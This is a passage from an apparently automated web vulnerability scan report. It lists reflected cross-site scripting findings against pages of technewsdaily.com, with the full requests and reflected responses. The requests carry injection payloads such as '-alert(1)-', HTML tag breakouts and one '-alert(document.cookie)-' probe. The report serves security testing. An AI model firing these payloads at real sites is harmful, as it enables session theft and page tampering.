'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/?58ac3'-alert(1)-'059b41dd681=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.177. http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /skylifter-flying-saucer-replacing-blimps-helicopters-1381/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df69f"><a>b51ac6643b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /skylifter-flying-saucer-replacing-blimps-helicopters-1381/?df69f"><a>b51ac6643b6=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66086

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/skylifter-flying-saucer-replacing-blimps-helicopters-1381/?df69f"><a>b51ac6643b6=1/" />
...[SNIP]...

1.178. http://www.technewsdaily.com/sound-attachment-for-laptops-1798/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /sound-attachment-for-laptops-1798/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe882'-alert(1)-'a85c45cea4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sound-attachment-for-laptops-1798fe882'-alert(1)-'a85c45cea4a/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40464

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/sound-attachment-for-laptops-1798fe882'-alert(1)-'a85c45cea4a/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.179. http://www.technewsdaily.com/sound-attachment-for-laptops-1798/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /sound-attachment-for-laptops-1798/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b61d"><a>911e2bb66a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sound-attachment-for-laptops-1798/?3b61d"><a>911e2bb66a1=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63649

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/sound-attachment-for-laptops-1798/?3b61d"><a>911e2bb66a1=1/" />
...[SNIP]...

1.180. http://www.technewsdaily.com/sound-attachment-for-laptops-1798/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /sound-attachment-for-laptops-1798/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb267'-alert(1)-'17ba15adde6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sound-attachment-for-laptops-1798/?fb267'-alert(1)-'17ba15adde6=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63287

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/sound-attachment-for-laptops-1798/?fb267'-alert(1)-'17ba15adde6=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.181. http://www.technewsdaily.com/stuxnet-malware-blueprint-dangerous-viruses-1353/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /stuxnet-malware-blueprint-dangerous-viruses-1353/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e54bc'-alert(1)-'9346134d09c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stuxnet-malware-blueprint-dangerous-viruses-1353e54bc'-alert(1)-'9346134d09c/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/stuxnet-malware-blueprint-dangerous-viruses-1353e54bc'-alert(1)-'9346134d09c/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.182. http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /t-mobile-wants-to-make-3g-faster-than-4g-1833/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6603'-alert(1)-'4bd04740dd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /t-mobile-wants-to-make-3g-faster-than-4g-1833e6603'-alert(1)-'4bd04740dd0/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
pt type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833e6603'-alert(1)-'4bd04740dd0/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.183. http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /t-mobile-wants-to-make-3g-faster-than-4g-1833/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1087d"><a>0265220a7a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /t-mobile-wants-to-make-3g-faster-than-4g-1833/?1087d"><a>0265220a7a6=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62276

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/?1087d"><a>0265220a7a6=1/" />
...[SNIP]...

1.184. http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /t-mobile-wants-to-make-3g-faster-than-4g-1833/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a9b7'-alert(1)-'c47869b8b17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /t-mobile-wants-to-make-3g-faster-than-4g-1833/?9a9b7'-alert(1)-'c47869b8b17=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:52:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:52:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/t-mobile-wants-to-make-3g-faster-than-4g-1833/?9a9b7'-alert(1)-'c47869b8b17=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.185. http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /taking-an-in-depth-look-at-3-d-glasses-1139/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f05b6'-alert(1)-'d0151755033 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /taking-an-in-depth-look-at-3-d-glasses-1139f05b6'-alert(1)-'d0151755033/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ript type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139f05b6'-alert(1)-'d0151755033/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.186. http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /taking-an-in-depth-look-at-3-d-glasses-1139/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe2c3"><a>cde99cc177c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /taking-an-in-depth-look-at-3-d-glasses-1139/?fe2c3"><a>cde99cc177c=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 71944

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/?fe2c3"><a>cde99cc177c=1/" />
...[SNIP]...

1.187. http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /taking-an-in-depth-look-at-3-d-glasses-1139/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39c03'-alert(1)-'07c101d197d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /taking-an-in-depth-look-at-3-d-glasses-1139/?39c03'-alert(1)-'07c101d197d=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 71582

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
pt type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/taking-an-in-depth-look-at-3-d-glasses-1139/?39c03'-alert(1)-'07c101d197d=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.188. http://www.technewsdaily.com/templates/technewsdaily/css/technewsdaily.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /templates/technewsdaily/css/technewsdaily.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b02'-alert(1)-'8f08b78f4f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/technewsdaily/css/79b02'-alert(1)-'8f08b78f4f5 HTTP/1.1
Host: www.technewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.technewsdaily.com/how-to-secure-privacy-on-facebook-0596f1fd9'-alert(document.cookie)-'eed141cc16/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:50:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:50:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40456

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/templates/technewsdaily/css/79b02'-alert(1)-'8f08b78f4f5",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.189. http://www.technewsdaily.com/terms-and-conditions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /terms-and-conditions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cef7d'-alert(1)-'918c6662efd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

